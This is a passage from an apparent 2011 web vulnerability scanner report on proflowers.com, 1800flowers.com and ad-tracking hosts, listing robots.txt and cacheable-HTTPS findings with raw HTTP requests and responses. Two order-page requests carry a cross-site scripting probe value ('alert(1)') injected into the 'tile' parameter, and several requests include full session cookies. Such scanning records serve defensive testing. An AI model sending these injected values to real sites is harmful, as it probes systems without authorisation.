21.15. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

21.16. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-0fxbD82AR3K-g.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 01:01:03 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 09 May 2011 01:01:03 GMT
Server: QS

User-agent: *
Disallow: /

21.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: products.proflowers.com

Response

HTTP/1.1 200 OK
Cache-Control: public,no-cache, no-store
Content-Type: text/plain
Expires: Tue, 10 May 2011 07:16:18 GMT
Last-Modified: Thu, 20 Jan 2011 23:51:56 GMT
Accept-Ranges: bytes
ETag: "1CBB8FD04FB3600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:59 GMT
Connection: close
Content-Length: 925

User-agent: *
Disallow: /-/
Disallow: /./
Disallow: /flowers/pickmeupbouquet-43065
Disallow: /BusinessServicesCorporate-BSV/
Disallow: /businessservicescorporate-bsv/
Disallow: /-day/
Disallow
...[SNIP]...

21.18. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1oYDINqGAyoFWsMAAAEyBVbDAAAP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1oYDINqGAyoFWsMAAAEyBVbDAAAP

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 01:29:51 GMT
Expires: Mon, 09 May 2011 01:29:51 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

21.19. http://safebrowsing.clients.google.com/safebrowsing/gethash

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/gethash

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 01:06:05 GMT
Expires: Mon, 09 May 2011 01:06:05 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

21.20. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 01:09:08 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

21.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Mon, 09 May 2011 01:00:44 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

21.22. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.p.mybuys.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:39 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Mon, 14 Mar 2011 13:58:26 GMT
ETag: "17206bf-1c-49e71b4a44480"-gzip
Accept-Ranges: bytes
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Content-Type: text/plain; charset=UTF-8
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: close

User-agent: *
Disallow: /

21.23. http://toolbarqueries.clients.google.com/tbproxy/af/query

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 01:00:39 GMT
Expires: Mon, 09 May 2011 01:00:39 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

21.24. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.searchignite.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: track.searchignite.com

Response

HTTP/1.1 200 OK
Content-Length: 52
Content-Type: text/plain
Last-Modified: Thu, 31 Aug 2006 14:18:42 GMT
Accept-Ranges: bytes
ETag: "bbd5705c8cdc61:2c86"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 01:00:32 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /SI/CM/

21.25. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s82534269827883

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 12:08:31 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "2d1153-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www34
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

21.26. http://ww30.1800baskets.com/include/cookieCloner.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /include/cookieCloner.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ww30.1800baskets.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:59 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 21 Apr 2011 18:22:34 GMT
Content-Length: 127
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/plain
Content-Language: en-US

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml

21.27. http://ww30.1800flowers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ww30.1800flowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:41 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 21 Apr 2011 18:21:28 GMT
Content-Length: 127
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/plain
Content-Language: en-US

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml

21.28. https://ww30.1800flowers.com/checkoutsignin.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ww30.1800flowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:15 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 21 Apr 2011 18:21:28 GMT
Content-Length: 127
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/plain
Content-Language: en-US

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml

21.29. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.137.41.101
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

21.30. http://www.ftd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=B550B8F479D710790018D87818E92C1C; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=B550B8F479D710790018D87818E92C1C; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:00:18 GMT
Vary: Accept-Encoding
Last-Modified: Mon, 24 Aug 2009 21:36:35 GMT
ETag: "1f-4a9307e3"
Content-Type: text/plain
Content-Length: 31
Date: Mon, 09 May 2011 01:00:19 GMT
X-Varnish: 1301368964
Age: 0
Via: 1.1 varnish
Connection: close

User-Agent:*
Disallow:/*?int=1

21.31. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 09 May 2011 01:00:52 GMT
Expires: Mon, 09 May 2011 01:00:52 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

21.32. http://www.googleadservices.com/pagead/conversion/1014041578/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1014041578/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 01:00:56 GMT
Expires: Mon, 09 May 2011 01:00:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

21.33. http://www.proflowers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.proflowers.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Tue, 10 May 2011 07:06:14 GMT
Last-Modified: Thu, 14 Apr 2011 18:15:56 GMT
Accept-Ranges: bytes
ETag: "1CBFACFFF625600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:26 GMT
Connection: close
Content-Length: 3518

User-agent: *
Disallow: /-/
Disallow: /./
Disallow: /about/
Disallow: /adtech/
Disallow: /affiliates.cfm
Disallow: /afj/
Disallow: /afterwork/
Disallow: /albertsons/
Disallow: /amex/
Disallo
...[SNIP]...

21.34. http://www.res-x.com/ws/r2/Resonance.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 55
Content-Type: text/plain
Last-Modified: Thu, 18 Jan 2007 19:00:12 GMT
Accept-Ranges: bytes
ETag: "08670e1323bc71:b77"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:27 GMT
Connection: close

# Disallow all web spiders
User-agent: *
Disallow: /

22. Cacheable HTTPS response
There are 8 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


22.1. https://accounts.proflowers.com/CustomerLogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...

22.2. https://accounts.proflowers.com/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Request

GET /Default.aspx?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vkckynuy3ubxtgsnb1qqko4a; path=/; HttpOnly
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:13 GMT
Content-Length: 53696

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...

22.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:31 GMT
Content-Length: 46815


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...

22.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:21:25 GMT
Content-Length: 62175


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...

22.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
